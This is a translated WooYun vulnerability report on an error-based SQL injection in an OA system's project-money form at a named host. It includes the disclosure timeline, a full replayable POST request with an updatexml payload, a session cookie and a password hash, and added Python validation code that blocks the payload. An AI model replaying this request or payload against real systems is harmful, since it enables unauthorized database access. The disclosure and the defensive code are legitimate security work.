WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles online ------------------------ http://drop.zone.ci/
2014-04-30: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2014-06-14: The vendor has actively ignored the vulnerability; details disclosed to the public.
Yet another SQL injection that allows dumping the database.
Exploitation: some of the data submitted via POST is injectable.
===================================
POST URL: http://oa.xun-ao.com/admin/project_money/add.post.php
The field post[money] is injectable.
===================================
Replaying the HTTP request is enough. The full HTTP request:
POST http://oa.xun-ao.com/admin/project_money/add.post.php HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://oa.xun-ao.com/admin/project_money/add_money.php?id=1
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Type: multipart/form-data; boundary=---------------------------7de31f355b0368
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 375
Host: oa.xun-ao.com
Pragma: no-cache
Cookie: PHPSESSID=b37ft762aldqvs1qceas4pub96; loginpass=faa87452e3adea3d7a8c5bd4b1882c44

-----------------------------7de31f355b0368
Content-Disposition: form-data; name="post[create_time]"

2014-04-22
-----------------------------7de31f355b0368
Content-Disposition: form-data; name="post[money]"

11 and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
-----------------------------7de31f355b0368
Content-Disposition: form-data; name="post[project_id]"

1
-----------------------------7de31f355b0368--
Filter the input, obviously.
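As an added example (not the reporter's or the vendor's code), this shows what "filter the input" means for the request above: a minimal parser for the multipart body, a per-field allow-list so post[money] can only ever be a decimal amount, and a check for the MySQL error-reporting functions the payload depends on. The field names, boundary and injected value come from the report; the validation rules and the benign sample are assumptions.

```python
import re

# Field names and boundary are taken from the report's request; the
# validation rules and sample values below are assumptions for illustration.
BOUNDARY = "---------------------------7de31f355b0368"
CRLF = "\r\n"

FIELD_RULES = {
    "post[create_time]": re.compile(r"\d{4}-\d{2}-\d{2}"),
    "post[money]": re.compile(r"-?\d{1,12}(\.\d{1,2})?"),  # decimal amount only
    "post[project_id]": re.compile(r"\d{1,10}"),
}
# MySQL XML functions abused for error-based extraction; no amount contains them.
ERROR_BASED = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)

def build_body(values):
    """Build a multipart/form-data body in the same shape as the report's request."""
    parts = [f'--{BOUNDARY}{CRLF}Content-Disposition: form-data; name="{n}"{CRLF}{CRLF}{v}{CRLF}'
             for n, v in values.items()]
    return "".join(parts) + f"--{BOUNDARY}--{CRLF}"

def parse_multipart(body, boundary):
    """Minimal multipart parser: map each form field name to its raw value."""
    fields = {}
    for part in body.split("--" + boundary):
        part = part.strip(CRLF)
        if not part or part == "--":  # preamble or closing delimiter
            continue
        headers, _, value = part.partition(CRLF + CRLF)
        name = re.search(r'name="([^"]+)"', headers)
        if name:
            fields[name.group(1)] = value
    return fields

def validate_fields(fields):
    """Return (field, reason) pairs that must block the request; empty list = accept."""
    problems = []
    for name, rule in FIELD_RULES.items():
        value = fields.get(name, "")
        if ERROR_BASED.search(value):
            problems.append((name, "error-based SQLi signature"))
        elif not rule.fullmatch(value):
            problems.append((name, "fails allow-list"))
    return problems

# Constructed samples: a normal submission and the injected one from the report.
BENIGN = {"post[create_time]": "2014-04-22", "post[money]": "11", "post[project_id]": "1"}
INJECTED = {**BENIGN, "post[money]": "11 and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))"}

def check(values):
    """Parse a body built from `values` and run it through the allow-list."""
    return validate_fields(parse_multipart(build_body(values), BOUNDARY))
```

The allow-list alone already rejects the injected value; the signature check only labels why, so the handler should still bind the amount as a parameter rather than rely on either check.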
Unable to contact the vendor, or the vendor actively refused.